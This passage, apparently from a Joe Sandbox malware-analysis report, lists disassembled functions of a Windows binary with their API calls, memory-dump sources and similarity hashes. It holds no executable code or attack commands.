Download Yara Rule

APIs

Part of subcall function 002EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ED7CD,?), ref: 002EE714

Part of subcall function 002EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ED7CD,?), ref: 002EE72D

Part of subcall function 002EEAB0: GetFileAttributesW.KERNEL32(?,002ED840), ref: 002EEAB1

lstrcmpiW.KERNEL32(?,?), ref: 002EED8A
MoveFileW.KERNEL32(?,?), ref: 002EEDC3
_wcslen.LIBCMT ref: 002EEF02
_wcslen.LIBCMT ref: 002EEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002EEF67

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 4444f6822b566c49ac3adb2296abd2e9fcae86996c6b1dab90b9404d39c8cc02
Instruction ID: de6bc74af21def248e610571aa57f9b8d14d97308c83e72bddfc9715c5d3bdc1
Opcode Fuzzy Hash: 4444f6822b566c49ac3adb2296abd2e9fcae86996c6b1dab90b9404d39c8cc02
Instruction Fuzzy Hash: F35173B24183859BCB25EB51CC819DFB3ECEF85310F40492EF289C3191EF71A6988B56

Function 002E9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002E9534
VariantClear.OLEAUT32 ref: 002E95A5
VariantClear.OLEAUT32 ref: 002E9604
VariantClear.OLEAUT32(?), ref: 002E9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002E96A2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 52c0d5d5a5ea51f88ece7b2c7aa76fc1a21899327620cf38848338449bc35906
Instruction ID: 9ef452f94a8b67c30bea80f2aee8986bb2a433f27dcfb7dbdff5c13ae56eb48f
Opcode Fuzzy Hash: 52c0d5d5a5ea51f88ece7b2c7aa76fc1a21899327620cf38848338449bc35906
Instruction Fuzzy Hash: 3B5159B5A10259AFCB10CF59C884AAAB7F8FF89310F05855AE909DB310E730E961CF90

Function 002F9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002F95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002F961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002F9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002F969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002F96A4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 89552bb1ef0c57008edda962a5b0abd33e40d24da170b55c6aa3044187df9a1d
Instruction ID: f32b818a5f070f8460c3923ed2868f65dd86fe6f975ad2394d64ec8f6135dc18
Opcode Fuzzy Hash: 89552bb1ef0c57008edda962a5b0abd33e40d24da170b55c6aa3044187df9a1d
Instruction Fuzzy Hash: F2514D35A102199FDF05EF64C881AAABBF5FF49354F048058E949AB3A2CB35ED51CF90

Function 00309941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0030999D
GetProcAddress.KERNEL32(00000000,?), ref: 00309A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00309A49
GetProcAddress.KERNEL32(00000000,?), ref: 00309A8F
FreeLibrary.KERNEL32(00000000), ref: 00309AAF

Part of subcall function 0029F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002F1A02,?,7644E610), ref: 0029F9F1
Part of subcall function 0029F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002E0354,00000000,00000000,?,?,002F1A02,?,7644E610,?,002E0354), ref: 0029FA18

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: d7212895a7f809fe1fa4a22381713bb5fee9449527f5edfc53b924179b4d1702
Instruction ID: c9f225548cbfd13ec19ba8e82009c83b8052d5f34f98f47cead217af825cdc95
Opcode Fuzzy Hash: d7212895a7f809fe1fa4a22381713bb5fee9449527f5edfc53b924179b4d1702
Instruction Fuzzy Hash: 21515E35606205DFCB02EF58C494EA9BBF4FF09314B1580A9E8069B7A2D731ED85CF91

Function 003175AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 0031766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00317682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003176AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002FB5BE,00000000,00000000), ref: 003176D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003176FF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: e059ebc8822b6d629d1627c35c03141af7881cb3cceb295b76e59130c3c98974
Instruction ID: 2489f2ed41b0c242443faeb16017b9a76affd29767626150307d78796b7ecfcb
Opcode Fuzzy Hash: e059ebc8822b6d629d1627c35c03141af7881cb3cceb295b76e59130c3c98974
Instruction Fuzzy Hash: 4F41A235A08514AFD72B9F2CCC48FE57B79EB0E350F1A0254F859A72E0D770AD91DA50

Function 002B23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002B2433
_free.LIBCMT ref: 002B2453

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7442bf7207e1e12f25ae241e87fd63d89e789df50f773c489df30dd12b7c4f14
Instruction ID: 46334cff85736284daecd539c6ccf1f0f9669c07aed7a508dbf8c6f899a5447e
Opcode Fuzzy Hash: 7442bf7207e1e12f25ae241e87fd63d89e789df50f773c489df30dd12b7c4f14
Instruction Fuzzy Hash: BE41CF36A20300DFCB20DF78C881A9DB7F5EF89354F1585A8E515EB395DA31AD15CB80

Function 002E224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002E2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 002E230E
Sleep.KERNEL32(00000000,?,?,?), ref: 002E2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 002E2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 002E232F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6e65a357a45dc9bd24da2fb2f49085dda6c3e50a880891d473712584dc41c16e
Instruction ID: a5e4880f37afe5b14df9aeb75ac4e8a4f2c0d51734d8d0bb86add07c47b35c18
Opcode Fuzzy Hash: 6e65a357a45dc9bd24da2fb2f49085dda6c3e50a880891d473712584dc41c16e
Instruction Fuzzy Hash: E831F471910259EFDB04CFA8CD89ADE7BB9EB09315F404225FE22E72D0C3709954CB90

Function 002FD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,002FCC63,00000000), ref: 002FD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 002FD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,002FCC63,00000000), ref: 002FD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,002FCC63,00000000), ref: 002FDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,002FCC63,00000000), ref: 002FDA37

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 2d853e616cf0ee80ecca683e371a8e0234840bacd658ea4cba1507b7177a61bc
Instruction ID: a86c7e5e31530c572938688e06350566db2b75708ed9f7f1e5b67bd9299735e7
Opcode Fuzzy Hash: 2d853e616cf0ee80ecca683e371a8e0234840bacd658ea4cba1507b7177a61bc
Instruction Fuzzy Hash: 96314C71524209EFDB20DFA5D884ABAF7F9EB05390F10882EE646D3150DB70EE519B60

Function 003161A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 003161E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 0031623C
_wcslen.LIBCMT ref: 0031624E
_wcslen.LIBCMT ref: 00316259
SendMessageW.USER32(?,00001002,00000000,?), ref: 003162B5

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 8c76e9357365a969c7639e138892ccfec63416234930ee03ece6f7916053626a
Instruction ID: 3a0ac9749c53e98d71fef58745a257b68be2bdf88a279841a890974deac760c3
Opcode Fuzzy Hash: 8c76e9357365a969c7639e138892ccfec63416234930ee03ece6f7916053626a
Instruction Fuzzy Hash: 65219135900218EBDB169FA4CC85AEE77BDEB59324F108616F925EA280D77089C6CF50

Function 0030138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 003013AE
GetForegroundWindow.USER32 ref: 003013C5
GetDC.USER32(00000000), ref: 00301401
GetPixel.GDI32(00000000,?,00000003), ref: 0030140D
ReleaseDC.USER32(00000000,00000003), ref: 00301445

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: aeed77799d099f677f654aff9157eefe35bd2daab7962371cf27b3426132d097
Instruction ID: e528a566fe99f1ae8ed9f8c76a78593ebb094d74f5c4f1b8c657a3b654694fbe
Opcode Fuzzy Hash: aeed77799d099f677f654aff9157eefe35bd2daab7962371cf27b3426132d097
Instruction Fuzzy Hash: EB218139601214AFD704EF65C894AAEB7F9EF49340F048479E84A97791CB30AC04CF90

Function 002BD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 002BD146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BD169

Part of subcall function 002B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,002A6A79,?,0000015D,?,?,?,?,002A85B0,000000FF,00000000,?,?), ref: 002B3BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BD18F
_free.LIBCMT ref: 002BD1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BD1B1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 48c9d895281ba67e02df19a54fe2b9b0a37addab31c937ac5c5d6de804d62c7e
Instruction ID: f04c96f7dd138a0d05a497d245e41d71e7d01bb95af62dfcb9d69338acb2b51b
Opcode Fuzzy Hash: 48c9d895281ba67e02df19a54fe2b9b0a37addab31c937ac5c5d6de804d62c7e
Instruction Fuzzy Hash: 4801F7766326167F33216ABE5C8CCFB7A6DDEC7BE13144129FD18C6244FA608C1181B0

Function 002B316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,002AF64E,002A545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002B3170
_free.LIBCMT ref: 002B31A5
_free.LIBCMT ref: 002B31CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002B31D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002B31E2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 11113cf436ceab1a0a1d78ca86f378449fd312b44efad91c89dfdb57326106ee
Instruction ID: 725afb8b5628909cdf40981a6a72764c8926047d0aa34ea09424534a1fe24f30
Opcode Fuzzy Hash: 11113cf436ceab1a0a1d78ca86f378449fd312b44efad91c89dfdb57326106ee
Instruction Fuzzy Hash: C701F9767716116B9613AA3C9C85EEB16AD9BCA3F17200924F83992191EE718A254920

Function 002E08FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?,?,002E0C4E), ref: 002E091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?), ref: 002E0936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?), ref: 002E0944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?), ref: 002E0954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?), ref: 002E0960

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 3ae4e23c595c695e2f400e283ed9067ec0d853e4a2757bfbb384d5c35d5d6772
Instruction ID: 006fad0d35dfb083afff038bee22bc6a83a0c82615ca72ba536d30504d8d8dac
Opcode Fuzzy Hash: 3ae4e23c595c695e2f400e283ed9067ec0d853e4a2757bfbb384d5c35d5d6772
Instruction Fuzzy Hash: F301F272610205BFEB014F56DC84B9E7BBDEF48B51F104024F905E2212D7B4CD91CBA0

Function 002EF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 002EF2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 002EF2BC
Sleep.KERNEL32(00000000), ref: 002EF2C4
QueryPerformanceCounter.KERNEL32(?), ref: 002EF2CE
Sleep.KERNEL32 ref: 002EF30A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 6758f1434606b78050181fe6289dd5eb04e26e14e14e67f4e4f7422034886413
Instruction ID: e4d37ed9b35fdb23b237267d9c027aeb84b86fd42c38087968ed72b5bd09af7c
Opcode Fuzzy Hash: 6758f1434606b78050181fe6289dd5eb04e26e14e14e67f4e4f7422034886413
Instruction Fuzzy Hash: C901CC30C10669EBCF40AFB5EE48AEEBB7CFB0D300F4004A6E901B2280DB309564C7A1

Function 002E1A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E1A99

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 74e1001981d26402c4bc54a348c56c1f0e7a589663277961d0c82f4a25eee4d6
Instruction ID: d281fcde45247c54414c3d13e62e3a6d02d80f3e0e9d19efb71abead4e03249f
Opcode Fuzzy Hash: 74e1001981d26402c4bc54a348c56c1f0e7a589663277961d0c82f4a25eee4d6
Instruction Fuzzy Hash: 2B0181B9641216BFDF124F65DC48DAA3B6DEF89364F614424F845C7360DA31DC50CA60

Function 002E1900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E1916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E1922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E1931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E1938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E194E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8707bb91d3386687273537269f7d766c0a7ea7b4a38ce41bf1ace119b6977529
Instruction ID: d471d076ec05aa5117857f3330295346ff934096738f160428ec07410f1112cc
Opcode Fuzzy Hash: 8707bb91d3386687273537269f7d766c0a7ea7b4a38ce41bf1ace119b6977529
Instruction Fuzzy Hash: 85F06275140312BBDB220F65DC4DF963B6DEF8E7A0F514424FA45D7251CA70DC508A70

Function 002E1960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E1976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E19AE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
